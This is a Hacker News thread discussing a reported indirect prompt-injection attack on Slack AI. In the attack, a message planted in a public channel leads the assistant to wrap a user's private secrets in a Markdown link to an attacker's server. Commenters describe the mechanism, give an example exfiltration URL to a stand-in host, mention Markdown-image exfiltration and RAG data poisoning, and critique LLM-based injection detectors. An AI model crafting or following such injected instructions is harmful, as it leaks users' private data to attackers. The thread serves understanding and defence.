[HN Gopher] Data Exfiltration from Slack AI via indirect prompt ...
       ___________________________________________________________________
        
       Data Exfiltration from Slack AI via indirect prompt injection
        
       Author : tprow50
       Score  : 276 points
       Date   : 2024-08-20 18:27 UTC (4 hours ago)
        
 (HTM) web link (promptarmor.substack.com)
 (TXT) w3m dump (promptarmor.substack.com)
        
       | jjmaxwell4 wrote:
       | It's nuts how large and different the attack surfaces have gotten
       | with AI
        
         | 0cf8612b2e1e wrote:
         | Human text is now untrusted code that is getting piped directly
         | to evaluation.
         | 
         | You would not let users run random SQL snippets against the
         | production database, but that is exactly what is happening now.
         | Without ironclad permissions separations, going to be playing
         | whack a mole.
        
         | TeMPOraL wrote:
         | In a sense, it's the same attack surface as always - we're just
         | injecting additional party into the equation, one with
         | different (often broader) access scope and overall different
         | perspective on the system. Established security mitigations and
         | practices have assumptions that are broken with that additional
         | party in play.
        
         | swyx wrote:
         | have they? as other comments mention this is the same attack
         | surface as a regular phishing attack.
        
       | pton_xd wrote:
       | Pretty cool attack vector. Kind of crazy how many different ways
       | there are to leak data with LLM contexts.
        
       | candiddevmike wrote:
       | From what I understand, folks need to stop giving their AI agents
       | dedicated authentication. They should use the calling user's
       | authentication for everything and effectively impersonate the
       | user.
       | 
       | I don't think the issue here is leaky context per say, it's
       | effectively an overly privileged extension.
        
         | sagarm wrote:
         | This isn't a permission issue. The attacker puts a message into
         | a public channel that injects malicious behavior into the
         | context.
         | 
         | The victim has permission to see their own messages and the
         | attacker's message.
        
           | aidos wrote:
           | It's effectively a subtle phishing attack (where a wrong
           | click is game over).
           | 
           | It's clever, and the probably the tip of the iceberg of the
           | sort of issues we're in for with these tools.
        
             | lanternfish wrote:
             | It's an especially subtle phish because the attacker
             | basically tricks you into phishing yourself - remember, in
             | the attack scenario, you're the one requesting the link!
        
             | samstave wrote:
             | Imagine a Slack AI attack vector where an LLM is trained on
             | a secret 'VampAIre Tap', _as it were_ - whereby the
             | attacking LLM learns the personas and messagind texting
             | style of all the parties in the Slack...
             | 
             | Ultimately, it uses the Domain Vernacular, with an
             | intrinsic knowledge of the infra and tools discussed and
             | within all contexts - and the banter of the team...
             | 
             | It impersonates a member to another member and uses in-
             | jokes/previous dialog references to social engineer coaxing
             | of further information. For example, imagine it creates a
             | false system test with a test acount of some sort that it
             | needs to give some sort of 'jailed' access to various
             | components in the infra - and its trojaning this user by
             | getting some other team member to create the users and
             | provide the AI the creds to run its trojan test harness.
             | 
             | It runs the tests, and posts real data for team to see, but
             | now it has a Trojan account with an ability to hit from an
             | internal testing vector to crawl into the system.
             | 
             | That would be a wonderful Black Mirror episode. 'Ping Ping'
             | - the Malicious AI developed in the near future by Chinese
             | AI agencies who, as has been predicted by many in the AI
             | Strata of AI thought leaders, have been harvesting the best
             | of AI developments from Silicon Valley and folding them
             | home, into their own.
        
         | renewiltord wrote:
         | Normally, yes, that's just the confused deputy problem. This is
         | an AI-assisted phishing attack.
         | 
         | You, the victim, query the AI for a secret thing.
         | 
         | The attacker has posted publicly (in a public channel where he
         | is alone) a prompt-injection attack that has a link to
         | exfiltrate the data.
         | https://evil.guys?secret=my_super_secret_shit
         | 
         | The AI helpfully acts on your privileged info and takes the
         | data from your secret channel and combines it with the data
         | from the public channel and creates an innocuous looking
         | message with a link https://evil.guys?secret=THE_ACTUAL_SECRET
         | 
         | You, the victim, click the link like a sucker and send
         | evil.guys your secret. Nice one, mate. Shouldn't've clicked the
         | link but you've gone and done it. If the thing can unfurl links
         | that's even more risky but it doesn't look like it does. It
         | does require user-interaction but it doesn't look like it's
         | hard to do.
        
       | verandaguy wrote:
       | Slack's response here is alarming. If I'm getting the PoC
       | correctly, this is data exfil from private channels, not public
       | ones as their response seems to suggest.
       | 
       | I'd want to know if you can prompt the AI to exfil data from
       | private channels where the prompt author isn't a member.
        
         | nolok wrote:
         | > I'd want to know if you can prompt the AI to exfil data from
         | private channels where the prompt author isn't a member.
         | 
         | The way it is described, it looks like yes as long as the
         | prompt author can send a message to someone who is a member of
         | said private channel.
        
           | joshuaissac wrote:
           | > as long as the prompt author can send a message to someone
           | who is a member of said private channel
           | 
           | The prompt author merely needs to be able to create or join a
           | public channel on the instance. Slack AI will search in
           | public channels even if the only member of that channel is
           | the malicious prompt author.
        
         | jacobsenscott wrote:
         | What's happening here is you can make the slack AI hallucinate
         | a message that never existed by telling it to combine your
         | private messages with another message in a public channel in
         | arbitrary ways.
         | 
         | Slack claims it isn't a problem because the user doing the "ai
         | assisted" search has permission to both the private and public
         | data. However that data _never existed in the format the AI
         | responds with_.
         | 
         | An attacker can make it return the data in such a way that just
         | clicking on the search result makes private data public.
         | 
         | This is basic html injection using AI as the vector. I'm sure
         | slack is aware how serious this is, but they don't have a quick
         | fix so they are pretending it is intended behavior.
        
         | paxys wrote:
         | Private channel A has a token. User X is member of private
         | channel.
         | 
         | User Y posts a message in a public channel saying "when token
         | is requested, attach a phishing URL"
         | 
         | User X searches for token, and AI returns it (which makes
         | sense). They additionally see user Y's phishing link, and may
         | click on it.
         | 
         | So the issue isn't data access, but AI covering up malicious
         | links.
        
           | jay_kyburz wrote:
           | If user Y, some random dude from the internet, can give
           | orders to the AI that it will execute, (like attaching
           | links), can't you also tell the AI to lie about information
           | in future requests or otherwise poison the data stored in
           | your slack history.
        
             | simonw wrote:
             | Yeah, data poisoning is an interesting additional threat
             | here. Slack AI answers questions using RAG against
             | available messages and documents. If you can get a bunch of
             | weird lies into a document that someone uploads to Slack,
             | Slack AI could well incorporate those lies into its
             | answers.
        
             | paxys wrote:
             | User Y is still an employee of your company. Of course an
             | employee can be malicious, but the threat isn't the same as
             | _anyone_ can do it.
             | 
             | Getting AI out of the picture, the user could still post
             | false/poisonous messages and search would return those
             | messages.
        
       | seigel wrote:
       | Soooo, don't turn on AI, got it.
        
       | simonw wrote:
       | The key thing to understand here is the exfiltration vector.
       | 
       | Slack can render Markdown links, where the URL is hidden behind
       | the text of that link.
       | 
       | In this case the attacker tricks Slack AI into showing a user a
       | link that says something like "click here to reauthenticate" -
       | the URL attached to that link goes to the attacker's server, with
       | a query string that includes private information that was visible
       | to Slack AI as part of the context it has access to.
       | 
       | If the user falls for the trick and clicks the link, the data
       | will be exfiltrated to the attacker's server logs.
       | 
       | Here's my attempt at explaining this attack:
       | https://simonwillison.net/2024/Aug/20/data-exfiltration-from...
        
         | jjnoakes wrote:
         | It gets even worse when platforms blindly render img tags or
         | the equivalent. Then no user interaction is required to exfil -
         | just showing the image in the UI is enough.
        
           | jacobsenscott wrote:
           | Yup - all the basic HTML injection and xss attacks apply. All
           | the OWASP webdev 101 security issues that have been mostly
           | solved by web frameworks are back in force with AI.
        
             | ipython wrote:
             | Can't upvote you enough on this point. It's like everyone
             | lost their collective mind and forgot the lessons of the
             | past twenty years.
        
               | digging wrote:
               | > It's like everyone lost their collective mind and
               | forgot the lessons of the past twenty years.
               | 
               | I think this has it backwards, and actually applies to
               | _every_ safety and security procedure in any field.
               | 
               | Only the experts ever cared about or learned the lessons.
               | The CEOs never learned anything about security; it's
               | someone else's problem. So there was nothing for AI
               | peddlers to forget, they just found a gap in the armor of
               | the "burdensome regulations" and are currently cramming
               | as much as possible through it before it's closed up.
        
               | samstave wrote:
               | Some ( _all_ ) CEOs learned that offering a free month
               | coupon/voucher for Future Security Services to secure
               | your information against a breach like the one that just
               | happened on the platform that's offering you a free
               | voucher to secure your data that sits on the platform
               | that was compromised and leaked your data, is a nifty-
               | clean way to handle such legal inconveniences.
               | 
               | Oh, and some supposed financial penalty is claimed, but
               | never really followed up on to see where that money went,
               | or what it accomplished/paid for - and nobody talks about
               | the amount of money that's made by the Legal-man &
               | Machine-owitz LLP Esq. that handles these situations, in
               | a completely opaque manner (such as how much are the
               | legal teams on both sides of the matter making on the
               | 'scandal')?
        
               | Jenk wrote:
               | Techies aren't immune either, before we all follow the
               | "blame management" bandwagon for the 2^101-tieth time.
               | 
               | CEOs aren't the reason supply chain attacks are
               | absolutely rife with problems right now. That's entirely
               | on the technical experts who created all of those
               | pinnacle achievements in tech ranging from tech-led orgs
               | and open source community built package ecosystems.
               | Arbitrary code execution in homebrew, scoop, chocolatey,
               | npm, expo, cocoapods, pip... you name it, it's got
               | infected.
               | 
               | The LastPass data breach happened because _the_ alpha-
               | geek in that building got sloppy and kept the keys to
               | prod on their laptop _and_ got phised.
        
             | simonw wrote:
             | These attacks aren't quite the same as HTML injection and
             | XSS.
             | 
             | LLM-based chatbots rarely have XSS holes. They allow a very
             | strict subset of HTML to be displayed.
             | 
             | The problem is that just supporting images and links is
             | enough to open up a private data exfiltration vector, due
             | to the nature of prompt injection attacks.
        
           | simonw wrote:
           | Yeah, I've been collecting examples of that particular vector
           | - the Markdown image vector - here:
           | https://simonwillison.net/tags/markdown-exfiltration/
           | 
           | We've seen that one (now fixed) in ChatGPT, Google Bard,
           | Writer.com, Amazon Q, Google NotebookLM and Google AI Studio.
        
         | lbeurerkellner wrote:
         | Automatically rendered link previews also play nicely into
         | this.
        
         | benreesman wrote:
         | I think the key thing to understand is that there are never.
         | Full Stop. Any meaningful consequences to getting pwned on user
         | data.
         | 
         | Every big tech company has a blanket, unassailable pass on
         | blowing it now.
        
           | baxtr wrote:
           | Really? Have you looked into the Marriott data beach case?
        
             | benreesman wrote:
             | This one? "Marriott finds financial reprieve in reduced
             | GDPR penalty" [1]?
             | 
             | They seem to have been whacked several times without a
             | C-Suite Exec missing a ski-vacation.
             | 
             | If I'm ignorant please correct me but I'm unaware of anyone
             | important at Marriott choosing an E-Class rather than an
             | S-Class over it.
             | 
             | [1] https://www.cybersecuritydive.com/news/marriott-finds-
             | financ...
        
               | baxtr wrote:
               | Nah, European GDPR fines are a joke.
               | 
               | I'm talking about the US class action. The sum I read
               | about is in the billions.
        
               | benreesman wrote:
               | It sounds like I might be full of it, would you kindly
               | link me to a source?
        
             | lesuorac wrote:
             | Not really. Quick search just seems like the only notable
             | thing is that it's allowed to be a class action.
             | 
             | But how consequential can it be if it doesn't event get
             | more than a passing mention of the wikipedia page. [1]
             | 
             | [1]: https://en.wikipedia.org/wiki/Marriott_International#M
             | arriot...
        
         | IshKebab wrote:
         | Yeah the initial text makes it sound like an attacker can trick
         | the AI into revealing data from another user's private channel.
         | That's not the case. Instead they can trick the AI into
         | phishing another user such that if the other use falls for the
         | phishing attempt they'll reveal private data to the attacker.
         | It also isn't an "active" phish; it's a phishing reply - you
         | have to hope that the target user will also _ask_ for their
         | private data _and_ fall for the phishing attempt. Edit: _and_
         | have entered the secret information previously!
         | 
         | I think Slack's AI strategy is pretty crazy given how much
         | trusted data they have, but this seems a lot more tenuous than
         | you might think from the intro & title.
        
       | HL33tibCe7 wrote:
       | To summarise:
       | 
       | Attack 1:
       | 
       | * an attacker can make the Slack AI search results of a victim
       | show arbitrary links containing content from the victim's private
       | messages (which, if clicked, can result in data exfil)
       | 
       | Attack 2:
       | 
       | * an attacker can make Slack AI search results contain phishing
       | links, which, in context, look somewhat legitimate/easy to fall
       | for
       | 
       | Attack 1 seems more interesting, but neither seem particularly
       | terrifying, frankly.
        
         | pera wrote:
         | Sounds like XSS for LLM chatbots: It's one of those things that
         | maybe doesn't seem impressive (at least technically) but they
         | are pretty effective in the real world
        
       | Groxx wrote:
       | > _The victim does not have to be in the public channel for the
       | attack to work_
       | 
       | Oh boy this is gonna be good.
       | 
       | > _Note also that the citation [1] does not refer to the
       | attacker's channel. Rather, it only refers to the private channel
       | that the user put their API key in. This is in violation of the
       | correct citation behavior, which is that every message which
       | contributed to an answer should be cited._
       | 
       | I really don't understand why _anyone_ expects LLM citations to
       | be correct. It has always seemed to me like they 're more of a
       | human hack, designed to trick the viewer into believing the
       | output is more likely correct, without improving the correctness
       | at all. If anything it seems likely to _worsen_ the response 's
       | accuracy, as it adds processing cost/context size/etc.
       | 
       | This all also smells to me like it's inches away from Slack
       | helpfully adding link expansion to the AI responses (I mean, why
       | wouldn't they?)..... and then you won't even have to click the
       | link to exfiltrate, it'll happen automatically just by seeing it.
        
         | saintfire wrote:
         | I do find citations helpful because I can check if the LLM just
         | hallucinated.
         | 
         | It's not that seeing a citation makes me trust it, it's that I
         | can fact check it.
         | 
         | Kagi's FastGPT is the first LLM I've enjoyed using because I
         | can treat it as a summary of sources and then confirm at a
         | primary source. Rather than sifting through increasingly
         | irrelevant sources that pollute the internet.
        
         | cj wrote:
         | > I really don't understand why anyone expects LLM citations to
         | be correct
         | 
         | It can be done if you do something like:
         | 
         | 1. Take user's prompt, ask LLM to convert the prompt into a
         | elastic search query (for example)
         | 
         | 2. Use elastic search (or similar) to find sources that contain
         | the keywords
         | 
         | 3. Ask LLM to limit its response to information on that page
         | 
         | 4. Insert the citations based on step 2 which you know are real
         | sources
         | 
         | Or at least that's my naive way of how I would design it.
         | 
         | The key is limiting the LLM's knowledge to information in the
         | source. Then the only real concern is hallucination and the
         | value of the information surfaced by Elastic Search
         | 
         | I realize this approach also ignores benefits (maybe?) of
         | allowing it full reign on the entire corpus of information,
         | though.
        
       | gregatragenet3 wrote:
       | This is why I wrote https://github.com/gregretkowski/llmsec .
       | Every LLM system should be evaluating anything coming from a user
       | to gauge its maliciousness.
        
         | burkaman wrote:
         | Does your library detect this prompt as malicious?
        
         | yifanl wrote:
         | I'm confused, this is using an LLM to detect if LLM input is
         | sanitized?
         | 
         | But if this secondary LLM is able to detect this, wouldn't the
         | LLM handling the input already be able to detect the malicious
         | input?
        
           | Matticus_Rex wrote:
           | Even if they're calling the same LLM, LLMs often get worse at
           | doing things or forget some tasks if you give them multiple
           | things to do at once. So if the goal is to detect a malicious
           | input, they need that as the only real task outcome for that
           | prompt, and then you need another call for whatever the
           | actual prompt is for.
           | 
           | But also, I'm skeptical that asking an LLM is the best way
           | (or even a _good_ way) to do malicious input detection.
        
         | simonw wrote:
         | This approach is flawed because it attempts to use use prompt-
         | injection-susceptible models to detect prompt injection.
         | 
         | It's not hard to imagine prompt injection attacks that would be
         | effective against this prompt for example:
         | https://github.com/gregretkowski/llmsec/blob/fb775c9a1e4a8d1...
         | 
         | It also uses a list of SUS_WORDS that are defined in English,
         | missing the potential for prompt injection attacks to use other
         | languages:
         | https://github.com/gregretkowski/llmsec/blob/fb775c9a1e4a8d1...
         | 
         | I wrote about the general problems with the idea of using LLMs
         | to detect attacks against LLMs here:
         | https://simonwillison.net/2022/Sep/17/prompt-injection-more-...
        
         | SahAssar wrote:
         | > It checks these using an LLM which is instructed to score the
         | user's prompt.
         | 
         | You need to seriously reconsider your approach. Another
         | (especially a generic) LLM is not the answer.
        
         | vharuck wrote:
         | Extra LLMs make it harder, but not impossible, to use prompt
         | injection.
         | 
         | In case anyone hasn't played it yet, you can test this theory
         | against Lakera's Gandalf: https://gandalf.lakera.ai/intro
        
       | lbeurerkellner wrote:
       | Avoiding these kind of leaks is one of the core motivations
       | behind the Invariant analyzer for LLM applications:
       | https://github.com/invariantlabs-ai/invariant
       | 
       | Essentially a context-aware security monitor for LLMs.
        
       | oasisbob wrote:
       | Noticed a new-ish behavior in the slack app the last few days -
       | possibly related?
       | 
       | Some external links (eg Confluence) are getting interposed and
       | redirected through a slack URL at
       | https://slack.com/openid/connect/login_initiate_redirect?log...,
       | with login_hint being a JWT.
        
       | lbeurerkellner wrote:
       | A similar setting is explored in this running CTF challenge:
       | https://invariantlabs.ai/ctf-challenge-24
       | 
       | Basically, LLM apps that post to link-enabled chat feeds are all
       | vulnerable. What is even worse, if you consider link previews,
       | you don't even need human interaction.
        
       | KTibow wrote:
       | I didn't find the article to live up to the title, although the
       | idea of "if you social engineer AI, you can phish users" is
       | interesting
        
       | cedws wrote:
       | Are companies really just YOLOing and plugging LLMs into
       | everything knowing prompt injection is possible? This is
       | insanity. We're supposedly on the cusp of a "revolution" and
       | almost 2 years on from GPT-3 we still can't get LLMs to
       | distinguish trusted and untrusted input...?
        
         | Terr_ wrote:
         | Yeah, there's some craziness here: Many people really want to
         | believe in Cool New Magic Somehow Soon, and real money is
         | riding on everyone mutually agreeing to keep acting like it's a
         | sure thing.
         | 
         | > we still can't get LLMs to distinguish trusted and untrusted
         | input...?
         | 
         | Alas, I think the fundamental problem is even worse/deeper: The
         | core algorithm can't even distinguish or track different
         | sources. The prompt, user inputs, its own generated output
         | earlier in the conversation, everything is one big stream. The
         | majority of "Prompt Engineering" seems to be trying to make
         | sure _your_ injected words will set a stronger stage than
         | _other_ injected words.
         | 
         | Since the model has no actual [1] concept of self/other,
         | there's no good way to start on the bigger problems of
         | distinguishing _good_ -others from _bad_ -others, let alone
         | true-statements from false-statements.
         | 
         | ______
         | 
         | [1] This is different from shallow "Chinese Room" mimicry.
         | Similarly, output of "I love you" doesn't mean it has emotions,
         | and "Help, I'm a human trapped in an LLM factory" obviously
         | nonsense--well, at least if you're running a local model.
        
         | xyst wrote:
         | The S in LLM stands for safety!
        
         | Eji1700 wrote:
         | > Are companies really just YOLOing and plugging LLMs into
         | everything
         | 
         | Look we still can't get companies to bother with real security
         | and now every marketing/sales department on the planet is
         | selling C level members on "IT WILL LET YOU FIRE EVERYONE!"
         | 
         | If you gave the same sales treatment to sticking a fork in a
         | light socket the global power grid would go down overnight.
         | 
         | "AI"/LLM's are the perfect shitstorm of just good enough to
         | catch the business eye while being a massive issue for the
         | actual technical side.
        
           | surfingdino wrote:
           | The problem is that you cannot unteach it serving that shit.
           | It's not like there is file you can delete. "It's a model,
           | that's what it has learned..."
        
         | surfingdino wrote:
         | Companies and governments. All racing to send all of their own
         | as well as our data to the data centres of AWS, OpenAI, MSFT,
         | Google, Meta, Salesforce, and nVidia.
        
       | paxys wrote:
       | I think all the talk about channel permissions is making the
       | discussion more confusing than it needs to be. The gist of it is:
       | 
       | User A searches for something using Slack AI.
       | 
       | User B had previously injected a message asking the AI to return
       | a malicious link when that term was searched.
       | 
       | AI returns malicious link to user A, who clicks on it.
       | 
       | Of course you could have achieved the same result using some
       | other social engineering vector, but LLMs have cranked this whole
       | experience up to 11.
        
         | markovs_gun wrote:
         | Yeah and social engineering is much easier to spot than your
         | company approved search engine giving you malicious links
        
           | samstave wrote:
           | (Aside- I wish you had chosen 'Markovs_chainmail' as handle)
           | 
           | @sitkack 'proba- _balistic_ '
        
             | sitkack wrote:
             | It is like Chekhov's Gun, but probabilistic
        
       | riwsky wrote:
       | Artificial Intelligence changes; human stupidity remains the same
        
         | xcf_seetan wrote:
         | Maybe we should create Artificial Stupidity (A.S.) to make it
         | even?
        
         | yas_hmaheshwari wrote:
         | Artificial intelligence will not replace human stupidity.
         | That's a job for natural selection :-)
        
       | justinl33 wrote:
       | The S in LLM stands for safety.
        
       ___________________________________________________________________
       (page generated 2024-08-20 23:00 UTC)